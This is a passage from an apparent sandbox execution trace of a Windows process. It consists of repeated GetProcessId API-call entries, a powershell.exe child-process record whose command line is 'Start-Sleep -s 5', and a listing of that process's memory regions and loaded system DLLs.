(Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.055] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.056] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.057] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.058] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.059] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.060] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.061] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.062] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.063] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.064] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0179.065] GetProcessId (Process=0x0) returned 0x0 [0183.861] GetProcessId (Process=0x0) returned 0x0 [0183.861] GetProcessId (Process=0x0) returned 0x0 [0183.861] GetProcessId (Process=0x0) returned 0x0 [0183.861] GetProcessId (Process=0x0) returned 0x0 [0183.861] GetProcessId (Process=0x0) returned 0x0 [0183.861] GetProcessId (Process=0x0) returned 0x0 [0183.861] GetProcessId (Process=0x0) returned 0x0 [0183.861] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.862] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.863] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.864] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.865] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.866] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.867] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.868] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.869] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.870] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.871] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.872] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.873] GetProcessId (Process=0x0) returned 0x0 [0183.874] GetProcessId (Process=0x0) returned 0x0 [0183.874] GetProcessId (Process=0x0) returned 0x0 [0183.874] GetProcessId (Process=0x0) returned 0x0 [0183.874] GetProcessId (Process=0x0) returned 0x0 [0183.874] GetProcessId (Process=0x0) returned 0x0 [0183.874] GetProcessId (Process=0x0) returned 0x0 [0183.874] GetProcessId (Process=0x0) returned 0x0 [0183.874] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.875] GetProcessId (Process=0x0) returned 0x0 [0183.876] GetProcessId (Process=0x0) returned 0x0 [0183.876] GetProcessId (Process=0x0) returned 0x0 Thread: id = 202 os_tid = 0x5a8 Process: id = "8" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x352ad000" os_pid = "0xdd8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x6d8" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Sleep -s 5" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2583 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2584 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2585 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2586 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2587 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2588 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2589 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2590 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2591 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2592 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2593 start_va = 0x7ff6edf60000 end_va = 0x7ff6edfd7fff monitored = 0 entry_point = 0x7ff6edf631a0 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 2594 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2595 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2596 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2597 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2598 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2599 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2600 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2686 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") 